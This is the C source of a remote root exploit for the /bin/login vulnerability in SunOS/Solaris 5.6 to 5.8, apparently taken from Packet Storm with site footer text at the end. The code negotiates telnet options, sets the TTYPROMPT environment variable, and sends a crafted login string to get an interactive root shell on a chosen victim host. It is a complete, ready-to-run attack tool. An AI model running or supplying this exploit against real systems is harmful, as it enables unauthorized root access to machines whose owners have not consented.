SunOS 5.6,5.7,5.8 remote /bin/login root exploit which uses the vulnerability described here.
762c482e53fa3ebd68fcb908fb91f3c8ff15e6d084aa07cd2ab6ce4ec51bf980/*
* SunOS 5.6,5.7,5.8 remote /bin/login root exploit
* telnet negotiation learned from good ol' TCP/IP Illustrated
* [mikecc/unixclan]
*
* bugtraq advisory: http://online.securityfocus.com/archive/1/293844
*
* yo to my friends: mstevens, jason, booterr, copperd, dave, ziphie,
* shazam, macd, s0kket, syn, ironfist, ph33r, moke, and digitalfallout
*
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <arpa/inet.h>
#include <arpa/telnet.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>
#include <unistd.h>
#include <getopt.h>
void respond(int,char *);
void negotiate(int);
void env(int,char *,char *);
void will(int,int);
void wont(int,int);
int main(int argc,char **argv)
{
struct sockaddr_in sock;
struct hostent *pHe;
int sd;
short port = -1;
int x;
char *host = NULL;
char *user = NULL;
char exp[1024];
int a;
char *default_port = "23";
printf("UC-login\n");
printf("SunOS/Solaris 5.6,5.7,5.8 /bin/login remote exploit\n");
printf("[mikecc/unixclan] [http://uc.zemos.net/]\n\n");
if (argc < 2)
{
printf("%s -h <victim> [-p port] [-u user]\n",argv[0]);
return 0;
}
while ((a = getopt(argc,argv,"h:p:u:")) != -1)
{
switch (a)
{
case 'h':
host = optarg;
break;
case 'p':
port = atoi(optarg);
break;
case 'u':
user = optarg;
break;
default:
printf("[-] invalid option.\n");
break;
}
}
if (host == NULL)
{
printf("[-] must specify a host to attack\n");
return 0;
}
if (user == NULL)
user = "root";
if (port < 0)
port = atoi(default_port);
if ((pHe = gethostbyname(host)) == NULL)
{
printf("Host lookup error.\n");
return 0;
}
printf("[*] attacking %s:%d\n",host,port);
printf("[*] opening socket\n");
if ((sd = socket(AF_INET,SOCK_STREAM,0)) == -1)
{
printf("[-] could not create socket");
return 0;
}
sock.sin_family = AF_INET;
sock.sin_port = htons(port);
memcpy(&sock.sin_addr.s_addr,pHe->h_addr,pHe->h_length);
if ((connect(sd,(struct sockaddr *)&sock,sizeof(sock))) == -1)
{
printf("[-] failed to connect to %s\n",host);
return 0;
}
printf("[*] connected!\n");
printf("[*] setting up exploit string\n");
strcpy(exp,user);
for (x = 0; x < 64; x++)
{
strcat(exp," c");
}
printf("[*] trying to login as %s\n",user);
respond(sd,exp);
return 0;
}
/*
* 1. do telnet negotiation
* 2. send the exploit string
* 3. read and write data as if you logged in as root
*/
void respond(int sd,char *expstr)
{
char buf[1024];
int x;
fd_set rset;
printf("[*] negotiating\n");
negotiate(sd);
printf("[*] sending exploit string\n");
write(sd,expstr,strlen(expstr));
printf("[*] did it work? now press enter\n");
fflush(stdout);
FD_ZERO(&rset);
while (1)
{
FD_SET(sd,&rset);
FD_SET(0,&rset);
select(sd+1,&rset,0,0,0);
if (FD_ISSET(sd,&rset))
{
memset(buf,'\0',sizeof(buf));
if ((x = read(sd,buf,sizeof(buf)-1)) == 0)
{
printf("Connection closed by foreign host.\n");
exit(-1);
}
fprintf(stderr,"%s",buf);
}
if (FD_ISSET(0,&rset))
{
memset(buf,'\0',sizeof(buf));
if ((x = read(0,buf,sizeof(buf)-1)) > 0)
{
write(sd,buf,x);
}
}
}
}
/*
* use an environment variable
*
* structure of env variable usage is:
* 1. IAC
* 2. TELOPT_NEW_ENVIRON
* 3. TELQUAL_IS
* 4. NEW_ENV_VAR
* 5. (name)
* 6. NEW_ENV_VALUE
* 7. (value)
* 8. IAC
* 9. SE
*
* (all found in arpa/telnet.h and you specify name and value)
*/
void env(int sd,char *name,char *val)
{
char buf[1024];
memset(buf,'\0',sizeof(buf));
sprintf(buf,"%c%c%c%c%c%s%c%s%c%c",
IAC,SB,TELOPT_NEW_ENVIRON,TELQUAL_IS,NEW_ENV_VAR,name,
NEW_ENV_VALUE,val,IAC,SE);
write(sd,buf,23); /* no error checking, uh-oh! */
}
/*
* telnet negotiation needed for
* talking with the telnet protocol
*/
void negotiate(int sd)
{
wont(sd,TELOPT_TTYPE);
wont(sd,TELOPT_NAWS);
wont(sd,TELOPT_XDISPLOC);
will(sd,TELOPT_LFLOW);
will(sd,TELOPT_LINEMODE);
wont(sd,TELOPT_OLD_ENVIRON);
will(sd,TELOPT_NEW_ENVIRON);
will(sd,TELOPT_BINARY);
env(sd,"TTYPROMPT","abcdef");
}
/*
* send a telnet WONT
*
* structure of a telnet WONT is:
* 1. IAC
* 2. WONT
* 3. what you wont do
* (all of the above are found in arpa/telnet.h)
*/
void wont(int sd,int opt)
{
char buf[3];
sprintf(buf,"%c%c%c",IAC,WONT,opt);
write(sd,buf,3); /* no error checking, uh-oh! */
}
/*
* send a telnet WILL
*
* structure of a telnet WILL is:
* 1. IAC
* 2. WILL
* 3. what you will do
* (all of the above are found in arpa/telnet.h)
*/
void will(int sd,int opt)
{
char buf[3];
sprintf(buf,"%c%c%c",IAC,WILL,opt);
write(sd,buf,3); /* no error checking, uh-oh! */
}
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed